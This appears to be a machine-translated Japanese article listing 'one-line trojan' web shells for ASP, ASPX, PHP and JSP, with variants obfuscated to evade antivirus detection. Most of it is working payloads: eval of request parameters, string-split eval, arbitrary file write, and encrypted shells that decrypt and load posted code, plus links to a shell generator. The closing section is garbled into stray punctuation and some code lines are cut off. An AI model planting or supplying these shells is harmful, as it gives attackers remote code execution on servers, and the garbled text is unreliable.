一言で木馬いろいろ変形


0 x 00:概要
一言で言えば木馬は短くて精悍で、しかも機能が強く、隠蔽性が非常によく、侵入の中でずっと強い役割を果たしている.一言で木馬はずっとソフトを殺すことと知恵を闘って勇を闘って、1種が現れて、ソフト秒を殺すのは規則を更新します.木馬は再び変形し、また殺される...
0 x 01:叙事
一、よくある一言

   
   
   
   
  1. ASP:eval request("pass")%>
  2. ASPX:= "Jscript"%>"z"], "unsafe"));%>
  3. PHP: php eval(@$_POST['a']); ?>
  4. JSP:"i"));%> //


   
   
   
   
  1. ASP:eval ""&( "e"& "v"& "a"& "l"& "("& "r"& "e"& "q"& "u"& "e"& "s"& "t"& "("& "0"& "-"& "2"& "-"& "5"& ")"& ")")%> //-7
  2. ASPX:
  3. var /*-/*-*/P /*-/*-*/= /*-/*-*/ "e"+ "v"+ /*-/*-*/
  4. "a"+ "l"+ "("+ "R"+ "e"+ /*-/*-*/ "q"+ "u"+ "e" /*-/*-*/+ "s"+ "t"+
  5. "[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
  6. ","+ "\""+ "u"+ "n"+ "s" /*-/*-*/+ "a"+ "f"+ "e"+ "\""+ ")"; eval
  7. ( /*-/*-*/P /*-/*-*/, /*-/*-*/ "u"+ "n"+ "s" /*-/*-*/+ "a"+ "f"+ "e" /*-/*-*/);%> //-7
  8. PHP: $_GET[a]($_GET[b]); ?>
  9. JSP:
  10. if(request.getParameter( "f")!= null)( new
  11. java.io.FileOutputStream(application.getRealPath( "\\")+request.getParameter( "f"))).write(request.getParameter( "t").getBytes());
  12. %>
  13. 
       
       
       
       
    1. ASP: if request ("MH")<>""then session("MH")=request("MH"):end
    2. if: if session( "MH")<> "" then execute session( "MH")%>
    3. ASPX:
    4. Language= "Jscript"%> eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36",
    5. "MD5").ToUpper()], "unsafe");%> //
    6. PHP: ($_=@$_GET[2]).@$_($_POST[1])?>
    7. JSP: new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>

    
       
       
       
       
    1. ASP: "C#" %> "System.Reflection"%> if (Request["pass"]!=null){ Session.Add("k", Guid.NewGuid().ToString().Replace("-", "").Substring(16)); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%> //
    2. PHP: session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&call_user_func($b[0],$b[1]);?>//
    3. JSP: "java.util.*,javax.crypto.*,javax.crypto.spec.*"%> class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%> if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%> //

      1、 d :

        :https://github.com/yzddmr6/as_webshell_venom
       
       
       
       

       2、 :

        :https://xz.aliyun.com/t/2799
       
       
       
       

    0x02:

         , 。 , , 。 。 。